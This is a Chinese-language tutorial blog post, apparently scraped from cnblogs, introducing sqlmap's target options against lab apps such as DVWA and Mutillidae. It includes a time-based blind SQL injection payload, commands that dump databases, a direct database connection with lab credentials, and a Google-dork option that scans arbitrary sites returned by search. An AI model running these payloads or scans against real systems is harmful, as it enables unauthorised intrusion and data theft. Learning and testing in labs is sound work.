zoukankan      html  css  js  c++  java
  • sqlmap自动注入1(Target完整的超级详细 如有错误望指出)

    SQLmap的自动注入学习之路(1)

    是通过五种sql注入漏洞的检测技术

    ' and(select*from(select(sleep(20)))a)#

    这是基于时间的盲注检测 看他返回的时间 可以在DVWA试试

    sqlmap支持非常全面的()数据库管理系统DBMS

    -d 参数直接连接 作为客服端连上服务器端

    mysql 3306端口 orcle的1521   sqlsever的1433

    我们先来查看一下sqlmap的版本

    sqlmap.py --version

    sqlmap.py -h(看参数)
                   -hh(显示更详细的的参数)

     一Target(连接)

    Sqlmap 针对关系型数据库的自动化注入工具,如mysql,mssql,oracle

    由于DVWA需要cookie注入 所以我们换一个网站不需要登陆的网站

    sqlmap.py -u "http://1192.168.1.101/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p username -f

    -p是指定参数的注入 -f是指纹 这是最简单的扫描了

    sqlmap.py -u “” -username -dbs -a

    查看当前数据库的使用名 查看是否最高权限

    这是数据库名 然后表名 然后列名

    看这里就用了三种检测方法都可以注入

    -d

    sqlmap.py -d "mysql://root:toor@192.168.1.101:3306/dwva"

    直连数据库的操作

    -m也可以扫描list.txt文件 扫描txt里面的url

    sqlmap.py -m list.txt --dbs

    扫描google搜索结果

    如果你想扫描url里面含有.php?id=1都去尝试注入

    sqlmap.py -g "inurl:".php?id=1""

    加下划线是转义的因为让电脑知道这个“”就是双引号本身

    刚才上面的方法都是GET方法来检查传输的 所有的都是通过URL来进行传输的 如果是POST方法呐

    1使用http的请求文件(burpsuit)

    sqlmap.py -r request.txt(让他自己去http请求头里面找每一个参数进行注入)

    接下来我们演示一下

    复制下来 然后新建一个文本文件 post.txt然后把上面的内容粘贴进去

    sqlmap.py -r post.txt --dbs

    2使用burpsuit log文件

    sqlmap.py -l log.txt

    首先要配置一下我们访问过程中的log文件

    有很多种 这里为了方便我们选代理类型的文件 然后选择存放位置保存为Log.txt凡是我的访问都会被放到log.txt里面

    先识别到了一个url 1 然后问我们是否进行注入检测

    因为时间过长 我们对username进行检查-p username

    因为这里没有我们要的参数所以会报错

    HTTPS

     sqlmap -u "url" -force-ssl

    扫描配置文件

    sqlmap -c sqlmap.conf

    二Request

     切记(少就是多 慢就是快)

  • 相关阅读:
    Word 2007 测试
    全硬盘安装Win Vista 6000 RTM方法(转)
    Javascript 解析,格式化日期 (转)
    转:使用hgfs实现vmare文件传输一法,无需任何网络相关设置
    配置和运行版本验证测试(转自msdn)
    TFS错误一则(資料集 'IterationParam' 的查詢執行失敗)
    ghostdoc 1.9.5 for vista install
    January 2007 Community Technology Preview 1 安装
    Changing to a friendly Team Foundation Server Name (舶来品)
    命令行使用小结
  • 原文地址:https://www.cnblogs.com/-zhong/p/10852151.html
Copyright © 2011-2022 走看看